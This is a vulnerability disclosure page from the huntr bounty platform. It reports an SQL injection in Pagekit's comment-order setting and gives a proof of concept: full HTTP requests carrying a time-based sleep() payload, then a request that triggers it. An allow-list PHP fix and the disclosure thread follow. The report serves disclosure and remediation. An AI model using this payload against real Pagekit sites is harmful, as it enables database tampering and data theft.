URL: https://huntr.dev/bounties/82f09b08-ceeb-4249-8855-b8bc718c4868/
Submission: On April 06 via api from US — Scanned from DE

SQL INJECTION IN PAGEKIT/PAGEKIT

Unverified
Reported on Oct 15th 2021

--------------------------------------------------------------------------------


DESCRIPTION

The configAction in SettingsController allows a user to set the order of the
comments listing. The allowed options are ASC and DESC. That config value is
then concatenated directly into the SQL query. Because there was no
sanitization before the config was saved, this leads to a SQL injection
vulnerability.


PROOF OF CONCEPT

Step 1: Log in as an admin user and set the config using the following request.
The payload is , if(conv('a',16,2)=conv('a',16,2),sleep(1),1)

POST /admin/system/settings/config HTTP/1.1
Host: rs.pk1018
Content-Length: 460
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: c13768fcc348b767955f2f10a8f7fd7967c3520a
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4403.0 Safari/537.36
Content-Type: application/json
Origin: http://rs.pk1018
Referer: http://rs.pk1018/admin/blog/settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pagekit_session=1ilh2sn95410q46iq73b6cg4f9; pagekit_auth=mOZn0198V2S2G.mEudZM%2FrfI3crXq6qYOimjJdvdmlQxmh0T9T20xs4FnzZgDl3%2F
Connection: close

{"name":"blog","config":{"comments":{"autoclose":false,"autoclose_days":14,"blacklist":"","comments_per_page":20,"gravatar":true,"max_depth":5,"maxlinks":2,"minidle":120,"nested":true,"notifications":"always","order":", if(conv('a',16,2)=conv('a',16,2),sleep(1),1)","replymail":true,"require_email":true},"posts":{"posts_per_page":20,"comments_enabled":true,"markdown_enabled":true},"permalink":{"type":"","custom":"{slug}"},"feed":{"type":"rss2","limit":20}}}


Step 2: Trigger the vulnerability by listing comments:

GET /api/blog/comment?post=1 HTTP/1.1
Host: rs.pk1018
Accept: application/json, text/plain, */*
X-XSRF-TOKEN: c13768fcc348b767955f2f10a8f7fd7967c3520a
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4403.0 Safari/537.36
Referer: http://rs.pk1018/blog/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pagekit_session=1ilh2sn95410q46iq73b6cg4f9; pagekit_auth=mOZn0198V2S2G.mEudZM%2FrfI3crXq6qYOimjJdvdmlQxmh0T9T20xs4FnzZgDl3%2F
Connection: close

Result: There is a delay in the server response caused by the sleep() call in
the query, which confirms the vulnerability.


IMPACT

Injection can result in data loss, corruption, or disclosure to unauthorized
parties, loss of accountability, or denial of access. Injection can sometimes
lead to complete host takeover.


OCCURRENCES

SettingsController.php L53

The input should be sanitized before it is saved to the config.
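The fix the Occurrences section asks for is an allow-list check on the order value at save time, repeated at query time so the stored setting is never trusted either. The PHP below is an added example written for this page, not Pagekit's own code; the class name CommentOrder, the created column used in the ORDER BY clause, and the shape of the config array are assumptions.

```php
<?php
// Added example (not Pagekit's code): allow-list validation for the comment
// ordering setting, so only the two legitimate SQL keywords can ever reach
// the query text.

declare(strict_types=1);

final class CommentOrder
{
    /** The only values the setting may legitimately hold. */
    private const ALLOWED = ['ASC', 'DESC'];

    /**
     * Normalise and validate a user-supplied order value at save time.
     * Returns the canonical keyword or throws, so a malformed value is
     * rejected before it is written to the stored configuration.
     */
    public static function validate(string $value): string
    {
        $normalized = strtoupper(trim($value));
        if (!in_array($normalized, self::ALLOWED, true)) {
            throw new InvalidArgumentException(
                sprintf('Invalid comment order "%s"; expected ASC or DESC', $value)
            );
        }
        return $normalized;
    }

    /**
     * Build the ORDER BY clause for the comment listing. The keyword is
     * re-validated here (defense in depth): even a value that reached the
     * config by some other path cannot be concatenated into the query.
     * The "created" column name is an assumption for this example.
     */
    public static function orderByClause(string $configuredOrder): string
    {
        return 'ORDER BY created ' . self::validate($configuredOrder);
    }
}

// Usage with a hypothetical config array mirroring the JSON in the PoC above.
$config = ['comments' => ['order' => 'desc']];
echo CommentOrder::orderByClause($config['comments']['order']), PHP_EOL;

// The report's payload is rejected at the allow-list check and never stored.
try {
    CommentOrder::validate(", if(conv('a',16,2)=conv('a',16,2),sleep(1),1)");
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
```

The important design choice is that the value is never escaped or quoted: an ORDER BY direction is a SQL keyword, not a string literal, so parameter binding does not apply and an exact allow-list is the only safe treatment. Validating both when the setting is saved and when the clause is built means a stale or hand-edited config entry cannot reintroduce the injection.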

We have contacted a member of the pagekit team and are waiting to hear back (6 months ago)
duongdpt modified the report (6 months ago)
We have sent a second follow up to the pagekit team. We will try again in 10 days. (5 months ago)
duongdpt
commented 5 months ago

Researcher

--------------------------------------------------------------------------------

@admin Hello. I see that the repository pagekit/pagekit is inactive now. Can we
disclose this report so I can request a CVE for this vulnerability through
Mitre?

Adam Nygate
commented 5 months ago

Admin

--------------------------------------------------------------------------------

Hi Duong, we will wait till the 15th of November to be sure that the project is
inactive before fully disclosing this report.

We have sent a third and final follow up to the pagekit team. This report is stale. (5 months ago)
duongdpt
commented 5 months ago

Researcher

--------------------------------------------------------------------------------

Can we disclose this now?

Jamie Slome
commented 5 months ago

Admin

--------------------------------------------------------------------------------

@q5ca - the report is now publicly visible ♥️

duongdpt
commented 5 months ago

Researcher

--------------------------------------------------------------------------------

Nice, thank you. And could you give me some help with the process of requesting
a CVE?

Jamie Slome
commented 5 months ago

Admin

--------------------------------------------------------------------------------

@duongdpt - we do not currently issue CVEs against reports which have not
received a response from the maintainer.

Vulnerability Type: CWE-89
Severity: High (7.4)
Affected Version: *
Visibility: Public
Status: Awaiting review

Reported by duongdpt (@q5ca), amateur
2021 © 418sec